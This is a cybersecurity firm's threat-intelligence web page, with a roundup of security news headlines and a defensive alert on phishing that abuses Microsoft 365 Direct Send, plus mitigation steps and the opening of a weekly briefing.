UK cyber leaders feel impact of Trump cutbacks | Computer Weekly

Mozilla warns Germany could soon declare ad blockers illegal

Regulator rebukes Nova Scotia Power's request for secrecy in cybersecurity inquiry | CBC News

Election workers fear 2026 threats without feds' support • The Register

By gutting its cyber staff, State Department ignores congressional directives | CyberScoop

Bill would give hackers letters of marque against US enemies • The Register

Models, Frameworks and Standards

DORA: six months into a resilience revolution | TechRadar

NIS2 Update: EU Cyber Authority Sets Out Compliance Expectations, but Implementation Is a Work in Progress | Skadden, Arps, Slate, Meagher & Flom LLP - JDSupra

EU’s Cyber Resilience Act: As Deadline Looms, Are You Ready For It? - EE Times

The EU NIS2 Directive and intra-group IT services | Hogan Lovells - JDSupra

New NIST guide explains how to detect morphed images - Help Net Security

Accounting Firm Pays Feds $175K for HIPAA Ransomware Breach

Careers, Working in Cyber and Information Security

Would you hire a hacker? | Computer Weekly

Building a New Generation of Security Talent Amid an Escalating Cyber - Infosecurity Magazine

Cyber teams are struggling to keep up with a torrent of security alerts | IT Pro

Law Enforcement Action and Take Downs

Developer jailed for malware that took out his employer • The Register

US seizes $2.8 million in crypto from Zeppelin ransomware operator

Can cyber group takedowns last? | IT Pro

Scattered Spider affiliate given 10 year sentence, ordered to pay $13 million in restitution | The Record from Recorded Future News

Nebraska man gets 1 year in prison for $3.5M cryptojacking scheme

US cops seize mega DDoS-for-hire racket RapperBot • The Register

A hacker tied to Yemen Cyber Army gets 20 months in prison

'Rapper Bot' hit the Pentagon in at least 3 cyberattacks | DefenseScoop

Serial hacker who defaced official websites is sentenced - National Crime Agency

Israeli government official arrested in Nevada sex crimes operation | The Independent

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

APT MuddyWater Attacking CFOs Leveraging OpenSSH, Enables RDP, and Scheduled Task

Russia-linked gang using Cisco devices for spying | Cybernews

FBI, Cisco Warn of Russian Attacks on 7-Year Flaw

FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage

Nation State Actors

Swap Around and Find Out: The New Rules of International Digital Economic Warfare – War on the Rocks

China

CrowdStrike warns of uptick in Silk Typhoon attacks this summer | CyberScoop

4 in 5 CISOs say DeepSeek must be regulated - Data Centre & Network News

Microsoft scales back Chinese access to cyber early warning system

China labels US as 'surveillance empire' over chip tracking • The Register

Chinese hackers are targeting web hosting firms - here's what we know | TechRadar

Microsoft restricts Chinese firms over hacking fears | Windows Central

Chinese APT Group Targets Web Hosting Services in Taiwan - Infosecurity Magazine

China cut itself off from the global internet on Wednesday • The Register

DPRK, China Suspected in South Korean Embassy Attacks

Russia

Russia-linked gang using Cisco devices for spying | Cybernews

Russia Is Cracking Down on End-to-End Encrypted Calls | WIRED

Russian Hacktivists Take Aim at Polish Power Plant, Again

Solana malware targeting Russian crypto developers • The Register

Russian hackers lurked in US courts for years and took sealed files | Stars and Stripes

Russian investment platform confirms cyberattack by pro-Ukraine hackers | The Record from Recorded Future News

Russia-linked European attacks renew concerns over water cybersecurity | CSO Online

Russian Hackers Hitting Critical Infrastructure, FBI Warns

Iran

APT MuddyWater Attacking CFOs Leveraging OpenSSH, Enables RDP, and Scheduled Task

Hackers disrupt communications of dozens of Iranian oil and cargo ships | Iran International

North Korea

North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms

North Korea's IT worker fraud has fooled nearly every Fortune 500 firm

Lazarus strikes again? $23m theft topples crypto platform

South Korean military hit by 9,200 cyber attacks in first half of 2025, up 44% from 2024 | The Straits Times

Hackers who exposed North Korean government hacker explain why they did it | TechCrunch

Tools and Controls

Study: Phishing always works, despite cyber training | Cybernews

Cybercriminals Attack VPS to Access Business Email Systems | Security Magazine

Hackers Weaponizing Cisco's Secure Links to Evade Link Scanning and By-Pass Network Filters

Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News

Password Managers Vulnerable to Data Theft via Clickjacking - SecurityWeek

Scans From Hacked Cisco Small Business Routers, Linksys and Araknis are at the Raise

Hackers can abuse IPv6 to hijack networks | Cybernews

McDonald's not lovin' it when hacker exposes rotten security • The Register

Cyber teams are struggling to keep up with a torrent of security alerts | IT Pro

The EU NIS2 Directive and intra-group IT services | Hogan Lovells - JDSupra

Children’s exposure to porn higher than before 2023 Online Safety Act, poll finds | Pornography | The Guardian

Insurers face challenges with UK ransomware ban

Britons back Online Safety Act’s age checks, but are sceptical of effectiveness and unwilling to share ID | Ipsos

Employee distraction is a bigger risk than attack sophistication - BetaNews

Android VPN apps used by millions are covertly connected AND insecure - Help Net Security

This Authentication Method Is Horribly Insecure—AI Just Made It Worse

CISOs need to think about risks before rushing into AI - Help Net Security

Hackers Abuse Vibe Coding Service to Build Malicious Sites

BYOD Evolution: Essential for Hybrid Work Productivity and Security

How VPNs are helping people evade increased censorship - and much more | ZDNET

78% of Businesses Are Investing in GenAI -- but Just 36% have the Infrastructure to Support It, New Unisys Study Finds

The Security Vulnerabilities to Watch for When You’re Vibe Coding

The invisible battlefield: Good AI vs Bad AI in the evolving cybersecurity landscape | TechRadar

How to Vibe Code With Security in Mind

Attackers Start Outside: Why MSSPs Should Prioritize External Threat Intelligence | MSSP Alert

Perplexity's Comet AI browser could expose your data to attackers - here's how | ZDNET

Elastic rejects claims of a zero-day RCE flaw in Defend EDR

Is personal cyber insurance at an inflection point? - Insurance Post

Making Pen Testing a Year-Round Cybersecurity Strength | SC Media UK

Solana malware targeting Russian crypto developers • The Register

Other News

Should Europe wean itself off US tech? - BBC News

Hackers can abuse IPv6 to hijack networks | Cybernews

Teen hackers aren't the problem. They're the wake-up call | Computer Weekly

UK firms at risk of more cyber incidents - here's how to stay protected | TechRadar

Aviation Tech Failures Expose Aging Systems and Cyber Risks

Dutch prosecution service attack keeps speed cameras offline • The Register

McDonald's not lovin' it when hacker exposes rotten security • The Register

Teen hacker’s journey: From curiosity to revenge | Cybernews

From medieval stronghold to cyber fortress: shielding Europe’s digital future | Cyprus Mail

Local governments struggle to defend critical infrastructure as threats grow - Help Net Security

How your solar rooftop became a national security issue | TechCrunch

How Outer Space Became the Next Big Attack Surface

UK cyber leaders feel impact of Trump cutbacks | Computer Weekly

Casino outfit Bragg says personal data untouched in attack • The Register

Train Maker Sues Hackers For Exposing Dodgy Efforts To Make Train Repairs More Difficult | Techdirt

What makes airport and airline systems so vulnerable to attack? - Help Net Security

Vulnerability Management

Majority of Organizations Ship Vulnerable Code, Study Finds - Infosecurity Magazine

Attacker “Patches” Vulnerability Post Exploitation to Lock Out Competi - Infosecurity Magazine

Majority of Organizations Ship Vulnerable Code, Study Finds - Infosecurity Magazine

Vulnerabilities

Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News

Researcher to release exploit for full auth bypass on FortiWeb

Microsoft releases emergency updates to fix Windows recovery

At least three UK organizations hit by SharePoint zero-day hacking campaign | The Record from Recorded Future News

FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage

Internet-wide Vulnerability Enables Giant DDoS Attacks

Apple discloses actively exploited zero-day affecting iOS, iPadOS and macOS | CyberScoop

Microsoft Windows Vulnerability Exploited to Deploy PipeMagic RansomExx Malware

Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware | Trend Micro (US)

Multiple Chrome High-Severity Vulnerabilities Let Attackers Execute Arbitrary Code

U.S. CISA adds Trend Micro Apex One flaw to its Known Exploited Vulnerabilities catalog

Over 800 N-able servers left unpatched against critical flaws

Scans From Hacked Cisco Small Business Routers, Linksys and Araknis are at the Raise

Easy ChatGPT Downgrade Attack Undermines GPT-5 Security

Xerox fixed path traversal and XXE bugs in FreeFlow Core

New Elastic EDR 0-Day Vulnerability Allows Attackers to Bypass Detection, Execute Malware, and Cause BSOD

High-Severity Vulnerabilities Patched in Chrome, Firefox - SecurityWeek

Public Exploit for Chained SAP Flaws Exposes Unpatched Systems to Remote Code Execution

Commvault plugs holes in backup suite that allow remote code execution - Help Net Security

Perplexity's Comet AI browser could expose your data to attackers - here's how | ZDNET

Elastic rejects claims of a zero-day RCE flaw in Defend EDR

Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems

Microsoft Windows 11 24H2 Update May Cause SSD Failures | TechPowerUp

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 18/08/2025 Black Arrow Admin 18/08/2025

Black Arrow Cyber Alert 18 August 2025 – Microsoft 365 Direct Send abuse enabling internal-appearing phishing

Black Arrow Cyber Alert 18 August 2025 – Microsoft 365 'Direct Send' abuse enabling phishing emails from internal addresses

Executive summary

Security researchers and vendors have confirmed active campaigns abusing Microsoft 365’s Direct Send feature to deliver emails that look like they originate from inside an organisation, without any mailbox compromise or authentication. The messages often utilise Microsoft infrastructure and can bypass external security controls, increasing the likelihood of credential theft and business email compromise. Microsoft has released a control that tenants can enable to reject unauthenticated Direct Send. Additional configuration can prevent direct delivery to the tenant when email records are configured to point to a third party.

What’s the risk to me or my business?

Attackers can send emails that impersonate your own users or departments. Common themes include voicemail or fax alerts and PDFs that contain QR codes leading to credential-harvesting pages. Because delivery uses Microsoft endpoints, messages may appear internal and can evade external filtering paths, undermining user trust and raising the success rate of social engineering and payment fraud.

Increased risk of further exploitation through other vulnerabilities

Successful credential theft enables lateral movement, mailbox rule abuse, internal spear-phishing and financial fraud. Some campaigns inject messages via unsecured third-party relays and VPS infrastructure before final delivery to Microsoft 365, complicating attribution and forensics.

What can I do?

Given active exploitation, immediate action is advised.

If you do not need Direct Send, block it
Enable the organisation setting to reject unauthenticated Direct Send traffic using PowerShell. This blocks anonymous messages where the envelope sender domain matches one of your accepted domains. Test, then monitor for breakage in legacy devices or services.
If you need Direct Send, authenticate and restrict it
Create inbound partner connectors and restrict by TLS certificate (preferred) or by approved IP ranges for printers, applications and third-party services that must send as your domain. Where full rejection is not yet possible, use transport rules to quarantine unauthenticated internal-looking mail while you add exceptions for legitimate sources.
Prevent direct delivery bypass when MX points to a third party
If your MX is not Exchange Online, configure an inbound connector and set restrictions so only your approved gateway path can deliver to the tenant. This closes the direct-to-tenant path that might otherwise bypass external filtering.
Strengthen authentication and policy
Enforce SPF, DKIM and DMARC with a reject policy, and tune anti-spoofing. Treat unauthenticated internal-looking messages as suspicious. Consider transport rules that quarantine them by default.
Hunt and monitor
Use Historical Message Trace, Threat Explorer, or Advanced Hunting to identify messages received without an attributed connector. Hunt for unauthenticated internal-looking mail, composite authentication failures and unusual attachment patterns such as PDFs with QR codes.
Prepare users
Brief staff that internal-looking emails can be forged. Call out common lures and warn specifically about QR-code attachments. Encourage out-of-band verification for sensitive requests.

Technical Summary

Abuse mechanism
Direct Send allows devices and applications to send to internal recipients without authentication via tenant smart hosts such as tenantname.mail.protection.outlook.com. Threat actors send spoofed messages to those endpoints using internal-looking From addresses, often with scripted SMTP clients.

Observed tactics
Lures frequently mimic voicemail or fax notifications and include PDFs with QR codes that resolve to credential harvesters. Some campaigns relay through unsecured third-party email appliances or VPS infrastructure before final delivery.

Why it lands
Messages traverse Microsoft infrastructure and can be treated as internal, so they may land in inboxes or junk despite composite authentication failures, especially where mail routing is complex or controls are not locked down.

Microsoft controls
Microsoft introduced a tenant-wide Reject Direct Send setting, plus guidance on preventing direct delivery to the tenant and on quarantine-first transport rules for organisations not ready to block.

Activity timeline
Campaigns observed since May 2025, with multiple vendors reporting ongoing abuse through July and August 2025.

Further information

Microsoft Exchange Team: Introducing more control over Direct Send in Exchange Online. Public preview of Reject Direct Send, behaviour and error text. (TECHCOMMUNITY.MICROSOFT.COM)
Microsoft Exchange Team: Direct Send vs sending directly to an Exchange Online tenant. Lockdown patterns, connectors, hunting and quarantine-first rules. (TECHCOMMUNITY.MICROSOFT.COM)
Varonis Threat Labs: Ongoing campaign abusing Direct Send to deliver internal-appearing phishing, with timeline and technique details. (Varonis)
Proofpoint: Attackers abusing M365 for internal phishing, delivery paths via unsecured relays, and recommended mitigations. (Proofpoint)
Mimecast Threat Intelligence: Direct Send abuse overview, observed artefacts and recommendations. (Mimecast)
eSentire Advisory: Direct Send abuse leading to internal phishing, QR-code lures and response guidance. (eSentire)
Barracuda: Securing Microsoft Direct Send, attack summary and guidance. (Barrcuda Blog)
IRONSCALES: Inside Job: attackers spoofing emails with M365 Direct Send, controls to reduce risk. (IRONSCALES)
BleepingComputer: Microsoft 365 Direct Send abused to send phishing as internal users. (BleepingComputer)

Need help understanding your gaps, or just want some advice? Get in touch with us.

#threatadvisory #threatintelligence #cybersecurity

Black Arrow Admin 17/08/2025 Black Arrow Admin 17/08/2025

Black Arrow Cyber Threat Intelligence Briefing 15 August 2025

Black Arrow Cyber Threat Intelligence Briefing 15 August 2025:

-Over 29,000 Exchange Servers Still Unpatched Against High-Severity Flaw

-Nearly Half of Enterprises Tested Had Easily Cracked Passwords

-Leaked Credentials Up 160% - What Attackers Are Doing With Them

-Ransomware Attacks Up by 41% Globally

-Physical Threats to Crypto Owners Hit Record Highs

-The UK Cyber Governance Code of Practice: Beyond Basic Protections to Culture, Leadership and Training

-The Human Firewall: Building a Cyber-Aware Workforce

-Microsoft Warns Organisations Without a Rehearsed Response Plan Are Hit Harder by a Security Incident

-Attack Yourself First: the Logic Behind Offensive Security

-These Two Ransomware Groups Are Ramping Up Attacks and Have Claimed Hundreds of Victims

-Financial Services Could Be Next in Line for ShinyHunters

-Three Notorious Cybercrime Gangs, Scattered Spider, ShinyHunters and Lapsus$, Appear to Be Collaborating

-Nation State Actor Groups are Getting Personal, Going After Executives in Their Personal Lives

Executive Summary

We begin with two calls to action for stronger cyber security: ensure your systems are patched to fix vulnerabilities, in this case Microsoft Exchange servers, and ensure your team uses strong passwords. We also report on the ongoing rise in cyber attacks including the increase in ransomware, the use of physical violence in cryptocurrency-related incidents, and changes within the attacker community such as a further shift towards the financial services sector.

To address these and other threats, it is essential to have a clear and objective understanding of your risks, and to counter them through a strategy that encompasses people, operations and technology.

The UK Cyber Governance Code of Practice is a valuable reference, even for organisations outside the UK. It includes two key principles: build strong defences through your employees, and rehearse how your leadership team will respond to an incident. It is also strongly recommended to commission assessments from an attacker’s perspective, to identify and resolve vulnerabilities before they are exploited.